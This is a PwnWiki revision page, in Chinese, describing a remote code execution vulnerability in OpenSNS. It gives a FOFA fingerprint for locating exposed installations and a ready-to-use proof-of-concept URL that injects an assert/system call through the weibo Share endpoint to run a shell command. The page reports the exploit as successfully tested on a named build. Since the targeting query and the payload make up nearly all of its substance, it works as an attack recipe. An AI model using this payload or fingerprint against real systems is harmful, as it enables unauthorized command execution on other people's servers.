Difference between revisions of "OpenSNS 遠程代碼執行漏洞/zh-cn"
From PwnWiki
(Created page with "OpenSNS 远程代码执行漏洞") |
(Created page with "经过测试,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。") |
||
| Line 14: | Line 14: | ||
OpenSNS | OpenSNS | ||
| − | + | 经过测试,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。 | |
| − | |||
| − | |||
==FOFA== | ==FOFA== | ||
<pre> | <pre> | ||
Latest revision as of 10:27, 28 June 2021
|
漏洞影响
OpenSNS
经过测试,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。
FOFA
icon_hash="1167011145"
POC
http://<target>/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
